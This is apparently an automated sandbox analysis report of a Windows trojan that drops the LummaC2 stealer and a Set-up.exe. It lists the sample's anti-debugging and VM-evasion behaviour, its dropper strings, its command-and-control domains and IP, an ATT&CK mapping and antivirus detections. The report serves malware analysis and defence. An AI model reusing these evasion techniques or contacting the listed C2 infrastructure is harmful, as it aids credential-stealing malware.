Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: E91836 second address: E9185A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 jmp 00007FA790B33269h 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: E919D7 second address: E919F5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA7911D2C95h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c push edx 0x0000000d pop edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: E919F5 second address: E919F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: E919F9 second address: E91A18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA7911D2C91h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b js 00007FA7911D2C8Ch 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: E91B7F second address: E91B84 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: E92B7E second address: E92B84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: E92B84 second address: E92B88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc

Tries to evade debugger and weak emulator (self modifying code)

Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	Special instruction interceptor: First address: C0D8DE instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	Special instruction interceptor: First address: C0D903 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	Special instruction interceptor: First address: C0D9BA instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	Special instruction interceptor: First address: DA83AD instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	Special instruction interceptor: First address: DD07A1 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	Special instruction interceptor: First address: C1445C instructions caused by: Self-modifying code

Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	Memory allocated: 5570000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	Memory allocated: 5740000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	Memory allocated: 7740000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc	Jump to behavior
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion	Jump to behavior
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion	Jump to behavior

Source: C:\Users\user\Desktop\8wiUGtm9UM.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Users\user\Desktop\8wiUGtm9UM.exe TID: 6512

Thread sleep time: -922337203685477s >= -30000s

Jump to behavior

Source: C:\Users\user\Desktop\8wiUGtm9UM.exe

Last function: Thread delayed

Source: C:\Users\user\AppData\Local\Temp\Set-up.exe

File Volume queried: C:\ FullSizeInformation

Jump to behavior

Source: C:\Users\user\Desktop\8wiUGtm9UM.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: 8wiUGtm9UM.exe, 8wiUGtm9UM.exe, 00000000.00000002.2175795861.0000000000D8D000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: Set-up.exe.0.dr	Binary or memory string: SYSTEM\ControlSet001\Services\VBoxSF
Source: 8wiUGtm9UM.exe, 00000000.00000003.2134557962.0000000005530000.00000004.00001000.00020000.00000000.sdmp, 8wiUGtm9UM.exe, 00000000.00000002.2175067355.0000000000532000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: <Module>ladddad.exeProgramStubWriterRunnerRunTimeAntiAntismscorlibSystemObjectdelaydelayTimeantiVMantiSandboxantiDebugantiEmulatorenablePersistenceenableFakeErrorencryptTypecompressedcversSystem.Collections.GenericList`1fileNamesfileTypesfileRunTypesfileDropPathsMainDecompressEncryptOrDecryptXORDecryptEncryptInitalizeIEnumerable`1EncryptOutputSwapGetResourceRunOnStartup.ctorWriteAllBytesExecuteDetectVirtualMachineGetModuleHandleDetectSandboxieCheckRemoteDebuggerPresentDetectDebuggerCheckEmulatordatatextkeysijfileregNameAppPathHidefileBytesfinalPathpathrunTypelpModuleNamehProcessisDebuggerPresentSystem.ReflectionAssemblyTitleAttributeAssemblyDescriptionAttributeAssemblyCompanyAttributeAssemblyProductAttributeAssemblyCopyrightAttributeAssemblyTrademarkAttributeAssemblyFileVersionAttributeAssemblyVersionAttributeSystem.Runtime.InteropServicesComVisibleAttributeGuidAttributeSystem.Runtime.CompilerServicesCompilationRelaxationsAttributeRuntimeCompatibilityAttributeladddadEnvironmentExitSystem.ThreadingThreadSleepget_ItemStringop_EqualitySystem.TextEncodingget_UnicodeGetBytesConcatSystem.IOPathCombineget_CountMemoryStreamSystem.IO.CompressionDeflateStreamStreamCompressionModeCopyToIDisposableDisposeToArrayByteSystem.CoreSystem.LinqEnumerable<EncryptInitalize>b__0Func`2CS$<>9__CachedAnonymousMethodDelegate1CompilerGeneratedAttributeRangeSelect<>c__DisplayClass3<EncryptOutput>b__2bAssemblyGetExecutingAssemblySystem.ResourcesResourceManagerGetObjectAppDomainget_CurrentDomainget_FriendlyNameFileExistsGetEntryAssemblyget_Locationop_InequalityCopyFileAttributesGetAttributesSetAttributesMicrosoft.Win32RegistryRegistryKeyLocalMachineget_UTF8GetStringOpenSubKeySetValueCurrentUserException.cctorConvertFromBase64StringAddGetTempPathSystem.DiagnosticsProcessProcessStartInfoget_StartInfoset_FileNameStartSystem.ManagementManagementObjectSearcherManagementObjectCollectionGetManagementObjectEnumeratorGetEnumeratorManagementBaseObjectget_CurrentToStringToLowerToUpperInvariantContainsMoveNextDllImportAttributekernel32.dllIntPtrToInt32GetCurrentProcessget_HandleDateTimeget_Nowget_Ticksiujwdkvbji0.resources
Source: 8wiUGtm9UM.exe, 00000000.00000002.2175067355.0000000000532000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: vmware
Source: Set-up.exe, 00000003.00000003.2380170053.0000000003F21000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000003.00000002.2382453113.0000000003F89000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllS
Source: Set-up.exe	Binary or memory string: Hyper-V RAW
Source: 8wiUGtm9UM.exe, 8wiUGtm9UM.exe, 00000000.00000003.2134557962.0000000005530000.00000004.00001000.00020000.00000000.sdmp, 8wiUGtm9UM.exe, 00000000.00000002.2175067355.0000000000532000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: DetectVirtualMachine
Source: Set-up.exe.0.dr	Binary or memory string: SYSINTERNALSNum_processorNum_ramnameallfreedriversNum_displaysresolution_xresolution_y\recent_filesprocessesuptime_minutesC:\Windows\System32\VBox.dll01vbox_firstSYSTEM\ControlSet001\Services\VBoxSFvbox_secondC:\USERS\PUBLIC\public_checkWINDBG.EXEdbgwireshark.exeprocmon.exex64dbg.exeida.exedbg_secdbg_thirdyadroinstalled_appsSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallSOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall%d%s\%sDisplayNameapp_nameindexCreateToolhelp32Snapshot failed.
Source: Set-up.exe, 00000003.00000003.2174988358.0000000000F27000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Y\MACHINE\SYSTEM\ControlSet001\Services\VBoxSFsion\Uninstall\{90160000-008C-0000-0000-0000000FF1CE}00000FF1CE}\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-008C-0000-0000-0000000FF1CE}
Source: 8wiUGtm9UM.exe, 00000000.00000002.2176400865.000000000152C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}y
Source: 8wiUGtm9UM.exe, 00000000.00000002.2175795861.0000000000D8D000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,

Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe

API call chain: ExitProcess graph end node

graph_2-12697

Source: C:\Users\user\Desktop\8wiUGtm9UM.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\8wiUGtm9UM.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Users\user\Desktop\8wiUGtm9UM.exe

Thread information set: HideFromDebugger

Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	File opened: NTICE
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	File opened: SICE
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	File opened: SIWVID

Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	Process queried: DebugPort	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe

Code function: 2_2_006EBAD0 LdrInitializeThunk,

2_2_006EBAD0

Source: C:\Users\user\Desktop\8wiUGtm9UM.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

LummaC encrypted strings found

Source: 8wiUGtm9UM.exe, 00000000.00000002.2178981326.0000000006745000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: bashfulacid.lat
Source: 8wiUGtm9UM.exe, 00000000.00000002.2178981326.0000000006745000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: tentabatte.lat
Source: 8wiUGtm9UM.exe, 00000000.00000002.2178981326.0000000006745000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: curverpluch.lat
Source: 8wiUGtm9UM.exe, 00000000.00000002.2178981326.0000000006745000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: talkynicer.lat
Source: 8wiUGtm9UM.exe, 00000000.00000002.2178981326.0000000006745000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: shapestickyr.lat
Source: 8wiUGtm9UM.exe, 00000000.00000002.2178981326.0000000006745000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: manyrestro.lat
Source: 8wiUGtm9UM.exe, 00000000.00000002.2178981326.0000000006745000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: slipperyloo.lat
Source: 8wiUGtm9UM.exe, 00000000.00000002.2178981326.0000000006745000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: wordyfindy.lat
Source: 8wiUGtm9UM.exe, 00000000.00000002.2178981326.0000000006745000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: censeractersj.click

Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	Process created: C:\Users\user\AppData\Local\Temp\LummaC2.exe "C:\Users\user\AppData\Local\Temp\LummaC2.exe"			Jump to behavior
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	Process created: C:\Users\user\AppData\Local\Temp\Set-up.exe "C:\Users\user\AppData\Local\Temp\Set-up.exe"			Jump to behavior

Source: 8wiUGtm9UM.exe, 8wiUGtm9UM.exe, 00000000.00000002.2175795861.0000000000D8D000.00000040.00000001.01000000.00000003.sdmp

Binary or memory string: _ Program Manager

Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\Set-up.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: 8wiUGtm9UM.exe, 00000000.00000002.2178981326.000000000734F000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, Set-up.exe, 00000003.00000002.2381403262.000000000078B000.00000002.00000001.01000000.00000008.sdmp, Set-up.exe.0.dr	Binary or memory string: procmon.exe
Source: 8wiUGtm9UM.exe, 00000000.00000002.2178981326.000000000734F000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, Set-up.exe, 00000003.00000002.2381403262.000000000078B000.00000002.00000001.01000000.00000008.sdmp, Set-up.exe.0.dr	Binary or memory string: wireshark.exe

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match

File source: decrypted.memstr, type: MEMORYSTR

Leaks process information

Source: global traffic

TCP traffic: 192.168.2.5:49721 -> 185.121.15.192:80

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match

File source: decrypted.memstr, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	2 Command and Scripting Interpreter	1 DLL Side-Loading	12 Process Injection	1 Masquerading	OS Credential Dumping	841 Security Software Discovery	Remote Services	1 Screen Capture	11 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 PowerShell	Boot or Logon Initialization Scripts	1 DLL Side-Loading	1 Disable or Modify Tools	LSASS Memory	12 Process Discovery	Remote Desktop Protocol	11 Archive Collected Data	3 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	261 Virtualization/Sandbox Evasion	Security Account Manager	261 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	2 Clipboard Data	4 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	12 Process Injection	NTDS	1 Remote System Discovery	Distributed Component Object Model	Input Capture	15 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	11 Deobfuscate/Decode Files or Information	LSA Secrets	1 File and Directory Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	4 Obfuscated Files or Information	Cached Domain Credentials	214 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	12 Software Packing	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 DLL Side-Loading	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
8wiUGtm9UM.exe	33%	Virustotal		Browse
8wiUGtm9UM.exe	55%	ReversingLabs	Win32.Trojan.Amadey
8wiUGtm9UM.exe	100%	Avira	HEUR/AGEN.1313526
8wiUGtm9UM.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Local\Temp\LummaC2.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\LummaC2.exe	37%	ReversingLabs	Win32.Trojan.MintZard
C:\Users\user\AppData\Local\Temp\Set-up.exe	26%	ReversingLabs	Win32.Infostealer.Tinba

Source	Detection	Scanner	Label
http://home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP1735210003?argument=0	0%	Avira URL Cloud	safe
censeractersj.click	0%	Avira URL Cloud	safe
http://home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP1735210003	0%	Avira URL Cloud	safe
http://home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP13	0%	Avira URL Cloud	safe
http://home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP173521000335a1	0%	Avira URL Cloud	safe
http://home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP1735210003http://home.fortth14ht.top/nTrmoVgOaovBJpKS	0%	Avira URL Cloud	safe
http://home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP17352100036963	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
home.fortth14ht.top	185.121.15.192	true	true		unknown
httpbin.org	34.226.108.155	true	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP1735210003	true	Avira URL Cloud: safe	unknown
wordyfindy.lat	false		high
slipperyloo.lat	false		high
curverpluch.lat	false		high
tentabatte.lat	false		high
bashfulacid.lat	false		high
manyrestro.lat	false		high
censeractersj.click	true	Avira URL Cloud: safe	unknown
http://home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP1735210003?argument=0	true	Avira URL Cloud: safe	unknown
shapestickyr.lat	false		high
https://httpbin.org/ip	false		high
talkynicer.lat	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://curl.se/docs/hsts.html	Set-up.exe.0.dr	false		high
http://html4/loose.dtd	8wiUGtm9UM.exe, 00000000.00000002.2178981326.000000000734F000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000003.00000002.2381403262.000000000078B000.00000002.00000001.01000000.00000008.sdmp, Set-up.exe.0.dr	false		high
https://httpbin.org/ipbefore	8wiUGtm9UM.exe, 00000000.00000002.2178981326.000000000734F000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000003.00000002.2381403262.000000000078B000.00000002.00000001.01000000.00000008.sdmp, Set-up.exe.0.dr	false		high
https://curl.se/docs/http-cookies.html	8wiUGtm9UM.exe, 00000000.00000002.2178981326.000000000734F000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000003.00000002.2381403262.000000000078B000.00000002.00000001.01000000.00000008.sdmp, Set-up.exe.0.dr	false		high
http://home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP13	Set-up.exe.0.dr	false	Avira URL Cloud: safe	unknown
http://home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP173521000335a1	Set-up.exe, 00000003.00000003.2380109507.0000000001056000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000003.00000003.2380215026.0000000001057000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000003.00000003.2380041481.000000000104C000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000003.00000002.2382170403.000000000105A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP1735210003http://home.fortth14ht.top/nTrmoVgOaovBJpKS	Set-up.exe, 00000003.00000002.2381386136.0000000000789000.00000004.00000001.01000000.00000008.sdmp	false	Avira URL Cloud: safe	unknown
https://curl.se/docs/alt-svc.html	Set-up.exe.0.dr	false		high
http://.css	8wiUGtm9UM.exe, 00000000.00000002.2178981326.000000000734F000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000003.00000002.2381403262.000000000078B000.00000002.00000001.01000000.00000008.sdmp, Set-up.exe.0.dr	false		high
http://home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP17352100036963	Set-up.exe, 00000003.00000003.2380109507.0000000001056000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000003.00000003.2380215026.0000000001057000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000003.00000003.2380041481.000000000104C000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000003.00000002.2382170403.000000000105A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://.jpg	8wiUGtm9UM.exe, 00000000.00000002.2178981326.000000000734F000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000003.00000002.2381403262.000000000078B000.00000002.00000001.01000000.00000008.sdmp, Set-up.exe.0.dr	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
185.121.15.192	home.fortth14ht.top	Spain		207046	REDSERVICIOES	true
34.226.108.155	httpbin.org	United States		14618	AMAZON-AESUS	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1581213
Start date and time:	2024-12-27 08:39:28 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 6m 40s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	6
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	8wiUGtm9UM.exe renamed because original name is a hash value
Original Sample Name:	a99adad8a9f9f1d9dcce30c42dd4be3a.exe
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@5/3@8/2
EGA Information:	Successful, ratio: 33.3%
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
Excluded IPs from analysis (whitelisted): 13.107.246.63, 52.149.20.212
Excluded domains from analysis (whitelisted): ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target 8wiUGtm9UM.exe, PID 528 because it is empty
Execution Graph export aborted for target Set-up.exe, PID 5880 because there are no executed function
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
185.121.15.192	vJPhYDClT5.exe	Get hash	malicious	Unknown	Browse	home.twentytk20ht.top/TQIuuaqjNpwYjtUvFojm1734579850
	jklg6EIhyR.exe	Get hash	malicious	Unknown	Browse	home.twentytk20ht.top/TQIuuaqjNpwYjtUvFojm1734579850
	qr2JeuLuOQ.exe	Get hash	malicious	Unknown	Browse	home.twentytk20ht.top/TQIuuaqjNpwYjtUvFojm1734579850
	E6rBvcWFWu.exe	Get hash	malicious	Unknown	Browse	home.twentytk20ht.top/TQIuuaqjNpwYjtUvFojm1734579850
	gDPzgKHFws.exe	Get hash	malicious	Cryptbot	Browse	home.twentytk20ht.top/TQIuuaqjNpwYjtUvFojm1734579850
	HFoyAy1tg8.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse	fivetk5sb.top/v1/upload.php
	8kl5nJ3f9x.exe	Get hash	malicious	Cryptbot	Browse	home.twentytk20ht.top/TQIuuaqjNpwYjtUvFojm1734579850
	7kf4hLzMoS.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse	twentytk20ht.top/v1/upload.php
	x6Rd1DzUJA.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse	fivetk5sb.top/v1/upload.php
	WCeE1A6Xyz.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse	home.fivetk5sb.top/niCGMfnfOxUBXxpLhBBB1734796753
34.226.108.155	mBr65h6L4w.exe	Get hash	malicious	Unknown	Browse
	HrIrtCXI3s.exe	Get hash	malicious	Unknown	Browse
	vJPhYDClT5.exe	Get hash	malicious	Unknown	Browse
	jklg6EIhyR.exe	Get hash	malicious	Unknown	Browse
	qr2JeuLuOQ.exe	Get hash	malicious	Unknown	Browse
	gDPzgKHFws.exe	Get hash	malicious	Cryptbot	Browse
	x6Rd1DzUJA.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse
	SzXZZDlkVE.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse
	ijn8pyFXSP.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse
	WzyLDvldFI.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
httpbin.org	w6cYYyWXqJ.exe	Get hash	malicious	Unknown	Browse	3.218.7.103
	mBr65h6L4w.exe	Get hash	malicious	Unknown	Browse	34.226.108.155
	HrIrtCXI3s.exe	Get hash	malicious	Unknown	Browse	34.226.108.155
	vJPhYDClT5.exe	Get hash	malicious	Unknown	Browse	34.226.108.155
	jklg6EIhyR.exe	Get hash	malicious	Unknown	Browse	34.226.108.155
	qr2JeuLuOQ.exe	Get hash	malicious	Unknown	Browse	34.226.108.155
	E6rBvcWFWu.exe	Get hash	malicious	Unknown	Browse	3.218.7.103
	gDPzgKHFws.exe	Get hash	malicious	Cryptbot	Browse	34.226.108.155
	HFoyAy1tg8.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse	98.85.100.80
	8kl5nJ3f9x.exe	Get hash	malicious	Cryptbot	Browse	98.85.100.80

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
REDSERVICIOES	vJPhYDClT5.exe	Get hash	malicious	Unknown	Browse	185.121.15.192
	jklg6EIhyR.exe	Get hash	malicious	Unknown	Browse	185.121.15.192
	qr2JeuLuOQ.exe	Get hash	malicious	Unknown	Browse	185.121.15.192
	E6rBvcWFWu.exe	Get hash	malicious	Unknown	Browse	185.121.15.192
	gDPzgKHFws.exe	Get hash	malicious	Cryptbot	Browse	185.121.15.192
	HFoyAy1tg8.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse	185.121.15.192
	8kl5nJ3f9x.exe	Get hash	malicious	Cryptbot	Browse	185.121.15.192
	7kf4hLzMoS.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse	185.121.15.192
	x6Rd1DzUJA.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse	185.121.15.192
	WCeE1A6Xyz.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse	185.121.15.192
AMAZON-AESUS	w6cYYyWXqJ.exe	Get hash	malicious	Unknown	Browse	3.218.7.103
	db0fa4b8db0333367e9bda3ab68b8042.x86.elf	Get hash	malicious	Gafgyt, Mirai	Browse	50.17.226.153
